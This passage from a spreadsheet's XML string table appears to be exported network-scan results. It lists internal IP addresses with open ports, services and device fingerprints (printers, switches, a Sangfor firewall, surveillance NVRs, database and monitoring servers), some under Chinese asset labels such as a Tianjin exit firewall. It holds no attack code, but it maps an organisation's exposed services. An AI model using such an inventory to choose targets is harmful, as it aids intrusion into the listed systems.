  </si>
  <si>
    <t>192.168.7.105</t>
  </si>
  <si>
    <t>192.168.7.170</t>
  </si>
  <si>
    <t>192.168.7.131</t>
  </si>
  <si>
    <t>192.168.7.104</t>
  </si>
  <si>
    <t>192.168.7.207</t>
  </si>
  <si>
    <t>192.168.7.183</t>
  </si>
  <si>
    <t>192.168.7.157</t>
  </si>
  <si>
    <t>192.168.7.17</t>
  </si>
  <si>
    <t>192.168.7.194</t>
  </si>
  <si>
    <t>192.168.7.132</t>
  </si>
  <si>
    <t>192.168.7.134</t>
  </si>
  <si>
    <t>192.168.7.202</t>
  </si>
  <si>
    <t>192.168.7.147</t>
  </si>
  <si>
    <t>192.168.7.122</t>
  </si>
  <si>
    <t>192.168.7.162</t>
  </si>
  <si>
    <t>192.168.7.117</t>
  </si>
  <si>
    <t>192.168.7.175</t>
  </si>
  <si>
    <t>192.168.7.153</t>
  </si>
  <si>
    <t>192.168.7.176</t>
  </si>
  <si>
    <t>192.168.7.110</t>
  </si>
  <si>
    <t>192.168.7.13</t>
  </si>
  <si>
    <t>192.168.7.168</t>
  </si>
  <si>
    <t>192.168.7.128</t>
  </si>
  <si>
    <t>192.168.7.210</t>
  </si>
  <si>
    <t>192.168.7.148</t>
  </si>
  <si>
    <t>192.168.7.204</t>
  </si>
  <si>
    <t>192.168.7.144</t>
  </si>
  <si>
    <t>192.168.7.136</t>
  </si>
  <si>
    <t>192.168.7.10</t>
  </si>
  <si>
    <t>192.168.100.118</t>
  </si>
  <si>
    <t>Huawei-Switch(simple)</t>
  </si>
  <si>
    <t>192.168.100.107</t>
  </si>
  <si>
    <t>192.168.100.102</t>
  </si>
  <si>
    <t>192.168.100.133</t>
  </si>
  <si>
    <t>192.168.0.26</t>
  </si>
  <si>
    <t>http(80)
unknown(8291)
tcpwrapped(443)
soap(8080,631,3910,53048,3911,8289,8295)
printer(515)</t>
  </si>
  <si>
    <t>Virata-EmWeb/R6_2_1</t>
  </si>
  <si>
    <t>jQuery
gSOAP 2.7</t>
  </si>
  <si>
    <t>Virata-EmWeb(HP-Color-LaserJet-MFP-M281fdw)(HP-printer),Virata-EmWeb/R6_2_1(HP-Color-LaserJet-MFP)</t>
  </si>
  <si>
    <t>192.168.100.119</t>
  </si>
  <si>
    <t>192.168.100.106</t>
  </si>
  <si>
    <t>192.168.0.23</t>
  </si>
  <si>
    <t>tcpwrapped(443,3911)
http(80)
unknown(8291)
printer(515)
soap(8080,3910,631,53048,8289,8295)</t>
  </si>
  <si>
    <t>Virata-EmWeb/R6_2_1,HP-LaserJet-MFP-M427fdw,Virata-EmWeb(HP-LaserJet-MFP-M427fd)(HP-printer)</t>
  </si>
  <si>
    <t>192.168.0.20</t>
  </si>
  <si>
    <t>telnet(23)
http(3146)</t>
  </si>
  <si>
    <t>192.168.100.1</t>
  </si>
  <si>
    <t>ftp(21)
tcpwrapped(64443)
ssh(22)
http(80)
ssl(443)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.100.131</t>
  </si>
  <si>
    <t>192.168.100.108</t>
  </si>
  <si>
    <t>192.168.100.116</t>
  </si>
  <si>
    <t>192.168.100.126</t>
  </si>
  <si>
    <t>192.168.100.112</t>
  </si>
  <si>
    <t>192.168.100.109</t>
  </si>
  <si>
    <t>192.168.15.1</t>
  </si>
  <si>
    <t>中间层服务器-历史库查询的前端应用-2</t>
  </si>
  <si>
    <t>192.168.0.100</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
telnet(23)
openflow(6633)</t>
  </si>
  <si>
    <t>192.168.100.104</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
telnet(23)
ftp(21)
tcpwrapped(64443)</t>
  </si>
  <si>
    <t>192.168.100.113</t>
  </si>
  <si>
    <t>192.168.100.110</t>
  </si>
  <si>
    <t>192.168.100.101</t>
  </si>
  <si>
    <t>http(80)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.0.1</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
domain(53)
telnet(23)
openflow(6633)</t>
  </si>
  <si>
    <t>192.168.0.10</t>
  </si>
  <si>
    <t>192.168.1.163</t>
  </si>
  <si>
    <t>sec-pc2fax-srv(9402)
http(8080,80,631,8018)
unknown(9403)
printer(515)
sec-t4net-clt(9401)
ssl(443)
sec-t4net-srv(9400)</t>
  </si>
  <si>
    <t>Samsung-Printer,Samsung-SyncThru-Web-Service</t>
  </si>
  <si>
    <t>SAMSUNG</t>
  </si>
  <si>
    <t>青岛物资系统服务器</t>
  </si>
  <si>
    <t>192.168.0.101</t>
  </si>
  <si>
    <t>其他</t>
  </si>
  <si>
    <t>http(80)
cwmp(7547)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.1.167</t>
  </si>
  <si>
    <t>HP-LaserJet-Pro,HP-printer</t>
  </si>
  <si>
    <t>192.168.0.84</t>
  </si>
  <si>
    <t>tcpwrapped(6087)
font-service(7100)
copycat(9093)
http(49152,52288,52266,6095,9095)
unknown(6091,6093)
doglms(6088)
ospf-lite(8899)</t>
  </si>
  <si>
    <t>192.168.100.130</t>
  </si>
  <si>
    <t>seajs</t>
  </si>
  <si>
    <t>192.168.100.132</t>
  </si>
  <si>
    <t>192.168.1.83</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
msrpc(49668,49670,49667,49664,49666,135,49677,49665)
unknown(5040,62368)
http(1947,5357)</t>
  </si>
  <si>
    <t>192.168.1.28</t>
  </si>
  <si>
    <t>192.168.0.22</t>
  </si>
  <si>
    <t>elpro_tunnel(4370)
ssh(3718)</t>
  </si>
  <si>
    <t>192.168.0.18</t>
  </si>
  <si>
    <t>192.168.0.17</t>
  </si>
  <si>
    <t>中间层服务器（前场-散客与团客）-2</t>
  </si>
  <si>
    <t>192.168.0.11</t>
  </si>
  <si>
    <t>192.168.0.15</t>
  </si>
  <si>
    <t>192.168.1.226</t>
  </si>
  <si>
    <t>tcpwrapped(80,443,631)
entp(1865)
printer(515)</t>
  </si>
  <si>
    <t>192.168.0.14</t>
  </si>
  <si>
    <t>zabbix代理服务器-青岛</t>
  </si>
  <si>
    <t>192.168.0.8</t>
  </si>
  <si>
    <t>3649954776</t>
  </si>
  <si>
    <t>192.168.0.12</t>
  </si>
  <si>
    <t>192.168.0.4</t>
  </si>
  <si>
    <t>192.168.0.240</t>
  </si>
  <si>
    <t>192.168.0.241</t>
  </si>
  <si>
    <t>unknown(24022,24021)</t>
  </si>
  <si>
    <t>192.168.1.164</t>
  </si>
  <si>
    <t>192.168.7.42</t>
  </si>
  <si>
    <t>192.168.8.75</t>
  </si>
  <si>
    <t>192.168.7.97</t>
  </si>
  <si>
    <t>192.168.8.28</t>
  </si>
  <si>
    <t>192.168.8.70</t>
  </si>
  <si>
    <t>192.168.8.147</t>
  </si>
  <si>
    <t>192.168.8.115</t>
  </si>
  <si>
    <t>192.168.8.30</t>
  </si>
  <si>
    <t>192.168.7.232</t>
  </si>
  <si>
    <t>192.168.8.127</t>
  </si>
  <si>
    <t>192.168.8.22</t>
  </si>
  <si>
    <t>192.168.8.71</t>
  </si>
  <si>
    <t>192.168.8.32</t>
  </si>
  <si>
    <t>192.168.8.19</t>
  </si>
  <si>
    <t>192.168.7.80</t>
  </si>
  <si>
    <t>192.168.8.67</t>
  </si>
  <si>
    <t>192.168.7.84</t>
  </si>
  <si>
    <t>192.168.8.176</t>
  </si>
  <si>
    <t>192.168.7.34</t>
  </si>
  <si>
    <t>192.168.7.250</t>
  </si>
  <si>
    <t>192.168.7.75</t>
  </si>
  <si>
    <t>192.168.8.126</t>
  </si>
  <si>
    <t>192.168.8.193</t>
  </si>
  <si>
    <t>192.168.8.182</t>
  </si>
  <si>
    <t>192.168.8.114</t>
  </si>
  <si>
    <t>192.168.8.188</t>
  </si>
  <si>
    <t>192.168.8.149</t>
  </si>
  <si>
    <t>192.168.8.47</t>
  </si>
  <si>
    <t>192.168.8.141</t>
  </si>
  <si>
    <t>192.168.7.73</t>
  </si>
  <si>
    <t>192.168.8.111</t>
  </si>
  <si>
    <t>192.168.8.109</t>
  </si>
  <si>
    <t>192.168.7.60</t>
  </si>
  <si>
    <t>192.168.8.11</t>
  </si>
  <si>
    <t>192.168.8.137</t>
  </si>
  <si>
    <t>192.168.7.96</t>
  </si>
  <si>
    <t>192.168.8.180</t>
  </si>
  <si>
    <t>192.168.7.39</t>
  </si>
  <si>
    <t>192.168.7.65</t>
  </si>
  <si>
    <t>192.168.8.44</t>
  </si>
  <si>
    <t>192.168.7.44</t>
  </si>
  <si>
    <t>192.168.8.148</t>
  </si>
  <si>
    <t>192.168.8.121</t>
  </si>
  <si>
    <t>192.168.8.120</t>
  </si>
  <si>
    <t>192.168.8.136</t>
  </si>
  <si>
    <t>192.168.8.116</t>
  </si>
  <si>
    <t>192.168.7.51</t>
  </si>
  <si>
    <t>192.168.8.66</t>
  </si>
  <si>
    <t>192.168.7.62</t>
  </si>
  <si>
    <t>192.168.8.102</t>
  </si>
  <si>
    <t>192.168.8.150</t>
  </si>
  <si>
    <t>192.168.8.142</t>
  </si>
  <si>
    <t>192.168.8.134</t>
  </si>
  <si>
    <t>192.168.8.76</t>
  </si>
  <si>
    <t>192.168.8.54</t>
  </si>
  <si>
    <t>192.168.7.45</t>
  </si>
  <si>
    <t>192.168.7.88</t>
  </si>
  <si>
    <t>192.168.8.59</t>
  </si>
  <si>
    <t>192.168.8.51</t>
  </si>
  <si>
    <t>192.168.7.83</t>
  </si>
  <si>
    <t>192.168.7.47</t>
  </si>
  <si>
    <t>192.168.8.152</t>
  </si>
  <si>
    <t>192.168.7.28</t>
  </si>
  <si>
    <t>192.168.7.85</t>
  </si>
  <si>
    <t>192.168.8.57</t>
  </si>
  <si>
    <t>192.168.8.36</t>
  </si>
  <si>
    <t>192.168.8.85</t>
  </si>
  <si>
    <t>192.168.7.221</t>
  </si>
  <si>
    <t>192.168.8.117</t>
  </si>
  <si>
    <t>192.168.7.70</t>
  </si>
  <si>
    <t>192.168.7.220</t>
  </si>
  <si>
    <t>192.168.7.78</t>
  </si>
  <si>
    <t>192.168.7.231</t>
  </si>
  <si>
    <t>192.168.8.140</t>
  </si>
  <si>
    <t>192.168.7.57</t>
  </si>
  <si>
    <t>192.168.7.40</t>
  </si>
  <si>
    <t>192.168.8.68</t>
  </si>
  <si>
    <t>192.168.8.177</t>
  </si>
  <si>
    <t>192.168.7.59</t>
  </si>
  <si>
    <t>192.168.8.185</t>
  </si>
  <si>
    <t>192.168.7.77</t>
  </si>
  <si>
    <t>192.168.7.30</t>
  </si>
  <si>
    <t>192.168.7.37</t>
  </si>
  <si>
    <t>192.168.8.87</t>
  </si>
  <si>
    <t>192.168.8.118</t>
  </si>
  <si>
    <t>192.168.8.53</t>
  </si>
  <si>
    <t>192.168.8.69</t>
  </si>
  <si>
    <t>192.168.7.89</t>
  </si>
  <si>
    <t>192.168.8.79</t>
  </si>
  <si>
    <t>192.168.8.98</t>
  </si>
  <si>
    <t>192.168.7.26</t>
  </si>
  <si>
    <t>192.168.7.25</t>
  </si>
  <si>
    <t>192.168.8.13</t>
  </si>
  <si>
    <t>192.168.7.23</t>
  </si>
  <si>
    <t>192.168.8.194</t>
  </si>
  <si>
    <t>192.168.8.119</t>
  </si>
  <si>
    <t>192.168.8.26</t>
  </si>
  <si>
    <t>192.168.8.146</t>
  </si>
  <si>
    <t>192.168.8.186</t>
  </si>
  <si>
    <t>192.168.7.81</t>
  </si>
  <si>
    <t>192.168.7.48</t>
  </si>
  <si>
    <t>192.168.8.61</t>
  </si>
  <si>
    <t>192.168.7.86</t>
  </si>
  <si>
    <t>192.168.7.69</t>
  </si>
  <si>
    <t>192.168.7.54</t>
  </si>
  <si>
    <t>192.168.8.104</t>
  </si>
  <si>
    <t>192.168.8.107</t>
  </si>
  <si>
    <t>192.168.8.157</t>
  </si>
  <si>
    <t>192.168.7.58</t>
  </si>
  <si>
    <t>192.168.8.35</t>
  </si>
  <si>
    <t>192.168.7.222</t>
  </si>
  <si>
    <t>192.168.8.122</t>
  </si>
  <si>
    <t>192.168.8.72</t>
  </si>
  <si>
    <t>192.168.8.129</t>
  </si>
  <si>
    <t>192.168.8.181</t>
  </si>
  <si>
    <t>192.168.8.77</t>
  </si>
  <si>
    <t>192.168.8.153</t>
  </si>
  <si>
    <t>192.168.8.73</t>
  </si>
  <si>
    <t>192.168.7.226</t>
  </si>
  <si>
    <t>192.168.7.223</t>
  </si>
  <si>
    <t>192.168.8.173</t>
  </si>
  <si>
    <t>192.168.8.158</t>
  </si>
  <si>
    <t>192.168.7.35</t>
  </si>
  <si>
    <t>192.168.7.29</t>
  </si>
  <si>
    <t>192.168.7.63</t>
  </si>
  <si>
    <t>192.168.8.100</t>
  </si>
  <si>
    <t>192.168.8.40</t>
  </si>
  <si>
    <t>192.168.8.179</t>
  </si>
  <si>
    <t>192.168.8.34</t>
  </si>
  <si>
    <t>192.168.8.84</t>
  </si>
  <si>
    <t>192.168.8.80</t>
  </si>
  <si>
    <t>192.168.8.50</t>
  </si>
  <si>
    <t>192.168.7.74</t>
  </si>
  <si>
    <t>192.168.9.16</t>
  </si>
  <si>
    <t>unknown(37777)
avt-profile-2(5005)
rtsp(554)
http(80)
radan-http(8088)
ssl(443)
upnp(5000)
tcpwrapped(8686)</t>
  </si>
  <si>
    <t>192.168.7.218</t>
  </si>
  <si>
    <t>192.168.8.12</t>
  </si>
  <si>
    <t>192.168.8.133</t>
  </si>
  <si>
    <t>192.168.8.172</t>
  </si>
  <si>
    <t>192.168.7.49</t>
  </si>
  <si>
    <t>192.168.8.74</t>
  </si>
  <si>
    <t>192.168.7.31</t>
  </si>
  <si>
    <t>192.168.7.224</t>
  </si>
  <si>
    <t>192.168.7.22</t>
  </si>
  <si>
    <t>192.168.8.151</t>
  </si>
  <si>
    <t>192.168.7.227</t>
  </si>
  <si>
    <t>192.168.8.82</t>
  </si>
  <si>
    <t>192.168.8.125</t>
  </si>
  <si>
    <t>192.168.7.46</t>
  </si>
  <si>
    <t>192.168.8.132</t>
  </si>
  <si>
    <t>192.168.8.135</t>
  </si>
  <si>
    <t>192.168.8.33</t>
  </si>
  <si>
    <t>192.168.7.53</t>
  </si>
  <si>
    <t>192.168.8.145</t>
  </si>
  <si>
    <t>192.168.7.68</t>
  </si>
  <si>
    <t>192.168.8.124</t>
  </si>
  <si>
    <t>192.168.8.89</t>
  </si>
  <si>
    <t>192.168.7.50</t>
  </si>
  <si>
    <t>192.168.8.56</t>
  </si>
  <si>
    <t>192.168.7.229</t>
  </si>
  <si>
    <t>192.168.8.39</t>
  </si>
  <si>
    <t>192.168.8.159</t>
  </si>
  <si>
    <t>192.168.8.58</t>
  </si>
  <si>
    <t>192.168.8.138</t>
  </si>
  <si>
    <t>192.168.8.29</t>
  </si>
  <si>
    <t>192.168.8.190</t>
  </si>
  <si>
    <t>192.168.8.52</t>
  </si>
  <si>
    <t>192.168.8.60</t>
  </si>
  <si>
    <t>192.168.8.37</t>
  </si>
  <si>
    <t>192.168.8.31</t>
  </si>
  <si>
    <t>192.168.8.78</t>
  </si>
  <si>
    <t>192.168.7.43</t>
  </si>
  <si>
    <t>192.168.8.64</t>
  </si>
  <si>
    <t>192.168.8.192</t>
  </si>
  <si>
    <t>192.168.7.72</t>
  </si>
  <si>
    <t>192.168.8.191</t>
  </si>
  <si>
    <t>192.168.8.49</t>
  </si>
  <si>
    <t>192.168.8.83</t>
  </si>
  <si>
    <t>192.168.8.65</t>
  </si>
  <si>
    <t>192.168.7.92</t>
  </si>
  <si>
    <t>192.168.8.25</t>
  </si>
  <si>
    <t>192.168.7.27</t>
  </si>
  <si>
    <t>192.168.8.143</t>
  </si>
  <si>
    <t>192.168.8.155</t>
  </si>
  <si>
    <t>192.168.7.32</t>
  </si>
  <si>
    <t>192.168.8.187</t>
  </si>
  <si>
    <t>192.168.8.48</t>
  </si>
  <si>
    <t>192.168.7.71</t>
  </si>
  <si>
    <t>192.168.8.43</t>
  </si>
  <si>
    <t>192.168.7.95</t>
  </si>
  <si>
    <t>192.168.8.86</t>
  </si>
  <si>
    <t>192.168.7.87</t>
  </si>
  <si>
    <t>192.168.8.27</t>
  </si>
  <si>
    <t>192.168.8.108</t>
  </si>
  <si>
    <t>192.168.8.154</t>
  </si>
  <si>
    <t>192.168.7.36</t>
  </si>
  <si>
    <t>192.168.7.55</t>
  </si>
  <si>
    <t>192.168.8.112</t>
  </si>
  <si>
    <t>192.168.7.76</t>
  </si>
  <si>
    <t>192.168.7.91</t>
  </si>
  <si>
    <t>192.168.8.144</t>
  </si>
  <si>
    <t>192.168.8.130</t>
  </si>
  <si>
    <t>192.168.8.189</t>
  </si>
  <si>
    <t>192.168.7.24</t>
  </si>
  <si>
    <t>192.168.8.99</t>
  </si>
  <si>
    <t>192.168.8.38</t>
  </si>
  <si>
    <t>192.168.7.38</t>
  </si>
  <si>
    <t>192.168.8.10</t>
  </si>
  <si>
    <t>192.168.9.15</t>
  </si>
  <si>
    <t>unknown(37777)
ssh(22)
avt-profile-2(5005)
rtsp(554)
http(80)
radan-http(8088)
ssl(443)
upnp(5000)
tcpwrapped(8686)</t>
  </si>
  <si>
    <t>192.168.8.184</t>
  </si>
  <si>
    <t>192.168.9.13</t>
  </si>
  <si>
    <t>unknown(37777)
avt-profile-2(5005)
upnp(5000)
http(80)
radan-http(8088)
rtsp(554)
tcpwrapped(8686)</t>
  </si>
  <si>
    <t>Angular(Bootstrap)(jQuery)</t>
  </si>
  <si>
    <t>192.168.8.88</t>
  </si>
  <si>
    <t>192.168.8.45</t>
  </si>
  <si>
    <t>192.168.7.52</t>
  </si>
  <si>
    <t>192.168.8.46</t>
  </si>
  <si>
    <t>192.168.9.14</t>
  </si>
  <si>
    <t>unknown(37777)
ssh(22)
avt-profile-2(5005)
upnp(5000)
http(80)
radan-http(8088)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.9.12</t>
  </si>
  <si>
    <t>mountd(2050)
unknown(38888,37777)
rpcbind(111)
upnp(5000)
http(80)
nfs_acl(2049)
tcpwrapped(8686)
nlockmgr(45285)</t>
  </si>
  <si>
    <t>Dahua embedded HD decoder dh-m70-4u-e</t>
  </si>
  <si>
    <t>成都数据库段网关</t>
  </si>
  <si>
    <t>192.168.9.1</t>
  </si>
  <si>
    <t>192.168.24.156</t>
  </si>
  <si>
    <t>192.168.24.79</t>
  </si>
  <si>
    <t>192.168.24.165</t>
  </si>
  <si>
    <t>192.168.24.173</t>
  </si>
  <si>
    <t>192.168.24.102</t>
  </si>
  <si>
    <t>192.168.24.211</t>
  </si>
  <si>
    <t>192.168.24.82</t>
  </si>
  <si>
    <t>192.168.24.33</t>
  </si>
  <si>
    <t>192.168.24.112</t>
  </si>
  <si>
    <t>192.168.24.69</t>
  </si>
  <si>
    <t>192.168.24.31</t>
  </si>
  <si>
    <t>192.168.24.14</t>
  </si>
  <si>
    <t>192.168.24.52</t>
  </si>
  <si>
    <t>192.168.24.80</t>
  </si>
  <si>
    <t>192.168.24.167</t>
  </si>
  <si>
    <t>192.168.24.40</t>
  </si>
  <si>
    <t>192.168.24.117</t>
  </si>
  <si>
    <t>192.168.24.60</t>
  </si>
  <si>
    <t>192.168.24.18</t>
  </si>
  <si>
    <t>192.168.24.56</t>
  </si>
  <si>
    <t>192.168.24.123</t>
  </si>
  <si>
    <t>192.168.24.104</t>
  </si>
  <si>
    <t>192.168.24.178</t>
  </si>
  <si>
    <t>192.168.24.132</t>
  </si>
  <si>
    <t>192.168.24.85</t>
  </si>
  <si>
    <t>192.168.24.44</t>
  </si>
  <si>
    <t>192.168.24.67</t>
  </si>
  <si>
    <t>192.168.24.101</t>
  </si>
  <si>
    <t>192.168.24.47</t>
  </si>
  <si>
    <t>192.168.24.97</t>
  </si>
  <si>
    <t>192.168.24.49</t>
  </si>
  <si>
    <t>192.168.24.87</t>
  </si>
  <si>
    <t>192.168.24.61</t>
  </si>
  <si>
    <t>192.168.24.125</t>
  </si>
  <si>
    <t>192.168.24.241</t>
  </si>
  <si>
    <t>192.168.24.148</t>
  </si>
  <si>
    <t>192.168.24.81</t>
  </si>
  <si>
    <t>192.168.24.119</t>
  </si>
  <si>
    <t>192.168.24.50</t>
  </si>
  <si>
    <t>192.168.24.37</t>
  </si>
  <si>
    <t>192.168.24.138</t>
  </si>
  <si>
    <t>192.168.24.28</t>
  </si>
  <si>
    <t>192.168.24.48</t>
  </si>
  <si>
    <t>192.168.24.245</t>
  </si>
  <si>
    <t>192.168.24.45</t>
  </si>
  <si>
    <t>192.168.24.43</t>
  </si>
  <si>
    <t>192.168.24.205</t>
  </si>
  <si>
    <t>192.168.24.206</t>
  </si>
  <si>
    <t>192.168.24.53</t>
  </si>
  <si>
    <t>192.168.24.127</t>
  </si>
  <si>
    <t>192.168.24.29</t>
  </si>
  <si>
    <t>192.168.24.59</t>
  </si>
  <si>
    <t>192.168.24.153</t>
  </si>
  <si>
    <t>192.168.24.164</t>
  </si>
  <si>
    <t>192.168.24.63</t>
  </si>
  <si>
    <t>192.168.24.179</t>
  </si>
  <si>
    <t>192.168.24.110</t>
  </si>
  <si>
    <t>192.168.24.161</t>
  </si>
  <si>
    <t>192.168.24.200</t>
  </si>
  <si>
    <t>192.168.24.182</t>
  </si>
  <si>
    <t>192.168.24.184</t>
  </si>
  <si>
    <t>192.168.24.96</t>
  </si>
  <si>
    <t>192.168.24.46</t>
  </si>
  <si>
    <t>192.168.24.133</t>
  </si>
  <si>
    <t>192.168.24.162</t>
  </si>
  <si>
    <t>192.168.24.174</t>
  </si>
  <si>
    <t>192.168.24.106</t>
  </si>
  <si>
    <t>192.168.24.73</t>
  </si>
  <si>
    <t>192.168.24.246</t>
  </si>
  <si>
    <t>192.168.24.36</t>
  </si>
  <si>
    <t>192.168.24.24</t>
  </si>
  <si>
    <t>192.168.24.121</t>
  </si>
  <si>
    <t>192.168.24.99</t>
  </si>
  <si>
    <t>192.168.24.202</t>
  </si>
  <si>
    <t>192.168.24.74</t>
  </si>
  <si>
    <t>192.168.24.41</t>
  </si>
  <si>
    <t>192.168.24.122</t>
  </si>
  <si>
    <t>192.168.24.152</t>
  </si>
  <si>
    <t>192.168.24.118</t>
  </si>
  <si>
    <t>192.168.24.35</t>
  </si>
  <si>
    <t>192.168.24.71</t>
  </si>
  <si>
    <t>192.168.24.137</t>
  </si>
  <si>
    <t>192.168.24.23</t>
  </si>
  <si>
    <t>192.168.24.176</t>
  </si>
  <si>
    <t>192.168.24.16</t>
  </si>
  <si>
    <t>192.168.24.203</t>
  </si>
  <si>
    <t>192.168.24.170</t>
  </si>
  <si>
    <t>192.168.24.163</t>
  </si>
  <si>
    <t>192.168.24.11</t>
  </si>
  <si>
    <t>192.168.24.150</t>
  </si>
  <si>
    <t>192.168.24.155</t>
  </si>
  <si>
    <t>192.168.24.175</t>
  </si>
  <si>
    <t>192.168.24.180</t>
  </si>
  <si>
    <t>192.168.24.108</t>
  </si>
  <si>
    <t>192.168.24.72</t>
  </si>
  <si>
    <t>192.168.24.243</t>
  </si>
  <si>
    <t>192.168.24.131</t>
  </si>
  <si>
    <t>192.168.24.57</t>
  </si>
  <si>
    <t>192.168.24.13</t>
  </si>
  <si>
    <t>192.168.24.149</t>
  </si>
  <si>
    <t>192.168.24.103</t>
  </si>
  <si>
    <t>192.168.24.64</t>
  </si>
  <si>
    <t>192.168.24.86</t>
  </si>
  <si>
    <t>192.168.24.172</t>
  </si>
  <si>
    <t>192.168.24.12</t>
  </si>
  <si>
    <t>192.168.24.25</t>
  </si>
  <si>
    <t>192.168.24.51</t>
  </si>
  <si>
    <t>192.168.24.144</t>
  </si>
  <si>
    <t>192.168.24.209</t>
  </si>
  <si>
    <t>192.168.24.183</t>
  </si>
  <si>
    <t>192.168.24.21</t>
  </si>
  <si>
    <t>192.168.24.120</t>
  </si>
  <si>
    <t>192.168.24.62</t>
  </si>
  <si>
    <t>192.168.24.146</t>
  </si>
  <si>
    <t>192.168.24.76</t>
  </si>
  <si>
    <t>192.168.24.17</t>
  </si>
  <si>
    <t>192.168.24.65</t>
  </si>
  <si>
    <t>192.168.24.171</t>
  </si>
  <si>
    <t>192.168.24.151</t>
  </si>
  <si>
    <t>192.168.24.160</t>
  </si>
  <si>
    <t>192.168.24.168</t>
  </si>
  <si>
    <t>192.168.24.55</t>
  </si>
  <si>
    <t>192.168.24.30</t>
  </si>
  <si>
    <t>192.168.24.201</t>
  </si>
  <si>
    <t>192.168.24.78</t>
  </si>
  <si>
    <t>192.168.24.124</t>
  </si>
  <si>
    <t>192.168.24.66</t>
  </si>
  <si>
    <t>192.168.24.34</t>
  </si>
  <si>
    <t>192.168.24.54</t>
  </si>
  <si>
    <t>192.168.24.114</t>
  </si>
  <si>
    <t>192.168.24.166</t>
  </si>
  <si>
    <t>192.168.24.113</t>
  </si>
  <si>
    <t>192.168.24.116</t>
  </si>
  <si>
    <t>192.168.24.109</t>
  </si>
  <si>
    <t>192.168.24.111</t>
  </si>
  <si>
    <t>192.168.100.54</t>
  </si>
  <si>
    <t>192.168.100.143</t>
  </si>
  <si>
    <t>天津SCP云管理平台</t>
  </si>
  <si>
    <t>192.168.22.31</t>
  </si>
  <si>
    <t>http(80)
ssl(4433,4480,443,4430)</t>
  </si>
  <si>
    <t>192.168.22.26</t>
  </si>
  <si>
    <t>http(80)
ssl(4433,23020,4480,443,23031)
ssh(22)
iscsi(3260)</t>
  </si>
  <si>
    <t>天津安全态势感知探针设备</t>
  </si>
  <si>
    <t>192.168.22.100</t>
  </si>
  <si>
    <t>ssl(443)</t>
  </si>
  <si>
    <t>Polyfill(jQuery)</t>
  </si>
  <si>
    <t>Sangfor-STA</t>
  </si>
  <si>
    <t>应用服务器</t>
  </si>
  <si>
    <t>192.168.22.54</t>
  </si>
  <si>
    <t>2251154404</t>
  </si>
  <si>
    <t>http(18099,8092,19850,8085,47001,8311,8020,7090,5985,80,10082,8017,19081,19080,8881,8099)
ms-wbt-server(3389)
ftp(81,10083)
914c-g(211)
netbios-ssn(139)
microsoft-ds(445)
tcpwrapped(10050)
raxa-mgmt(6099)
msrpc(63044,49805,49664,49665,135,49675,49666,49874)</t>
  </si>
  <si>
    <t>60.28.99.74</t>
  </si>
  <si>
    <t>192.168.100.145</t>
  </si>
  <si>
    <t>192.168.100.144</t>
  </si>
  <si>
    <t>192.168.31.1</t>
  </si>
  <si>
    <t>192.168.22.27</t>
  </si>
  <si>
    <t>天津出口防火墙</t>
  </si>
  <si>
    <t>192.168.22.21</t>
  </si>
  <si>
    <t>chimera-hwm(4009)
ssl(443,7443)
http(80,81)
ssh(22345)</t>
  </si>
  <si>
    <t>Sangfor-Firewall management system</t>
  </si>
  <si>
    <t>192.168.24.254</t>
  </si>
  <si>
    <t>192.168.22.154</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
ilo-vm(17988)
ssh(22)
ilo-console(17990)</t>
  </si>
  <si>
    <t>192.168.100.141</t>
  </si>
  <si>
    <t>192.168.33.1</t>
  </si>
  <si>
    <t>192.168.22.33</t>
  </si>
  <si>
    <t>192.168.100.138</t>
  </si>
  <si>
    <t>192.168.22.155</t>
  </si>
  <si>
    <t>192.168.32.1</t>
  </si>
  <si>
    <t>192.168.100.55</t>
  </si>
  <si>
    <t>Lighttpd 1.4.35</t>
  </si>
  <si>
    <t>Lighttpd</t>
  </si>
  <si>
    <t>192.168.22.36</t>
  </si>
  <si>
    <t>unknown(50051)
batman(4305)
d-data-control(4302)
ds-clnt(4402)
mysql(3306)
ssh(22)
d-data(4301)
pscl-mgt(4312)
http(9981,8180,8280,4388,9980,4488)
ds-srvr(4401)
dey-sapi(4330)
nfs_acl(2049)
redis(6379)
grpc(50052,50053)
rpcbind(111)
mountd(20048)</t>
  </si>
  <si>
    <t>192.168.22.50</t>
  </si>
  <si>
    <t>192.168.100.139</t>
  </si>
  <si>
    <t>192.168.100.140</t>
  </si>
  <si>
    <t>192.168.17.1</t>
  </si>
  <si>
    <t>192.168.22.77</t>
  </si>
  <si>
    <t>p2pq(1981)
ssl(443)</t>
  </si>
  <si>
    <t>Sundray switch</t>
  </si>
  <si>
    <t>192.168.16.1</t>
  </si>
  <si>
    <t>192.168.100.51</t>
  </si>
  <si>
    <t>天津网关</t>
  </si>
  <si>
    <t>192.168.22.1</t>
  </si>
  <si>
    <t>zabbix代理服务器-天津</t>
  </si>
  <si>
    <t>192.168.22.200</t>
  </si>
  <si>
    <t>4243588016</t>
  </si>
  <si>
    <t>ssh(22)
tcpwrapped(10050)
ssl(10051)</t>
  </si>
  <si>
    <t>192.168.24.253</t>
  </si>
  <si>
    <t>soap(82)
tcpwrapped(20008,20004,20014,20002,20010,20006,20018,20016,20012)
dnp(20000)
x11(6060)
rtsp(554)
http(80)</t>
  </si>
  <si>
    <t>InVidTech-nvr(Uniview-Video Surveillance Device)</t>
  </si>
  <si>
    <t>192.168.24.252</t>
  </si>
  <si>
    <t>soap(82)
dnp(20000)
x11(6060)
rtsp(554)
http(80)
tcpwrapped(20028,20014,20002,20018,20008,20022,20030,20006,20026,20020,20004,20012,20024,20010,20016)</t>
  </si>
  <si>
    <t>Uniview-Video Surveillance Device(Uniview-NVR)(InVidTech-nvr)</t>
  </si>
  <si>
    <t>192.168.33.86</t>
  </si>
  <si>
    <t>unknown(17421)
http(8102,25555,8100,8101,28899)
ssl(28000)
netbios-ssn(139)
msrpc(49176,49154,49156,49155,49153,49175,135,47546,49152)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>Express</t>
  </si>
  <si>
    <t>192.168.32.2</t>
  </si>
  <si>
    <t>qotd(17)
daytime(13)
ms-wbt-server(3389)
mysql(3306)
unknown(63458,5040)
echo(7)
mysqlx(33060)
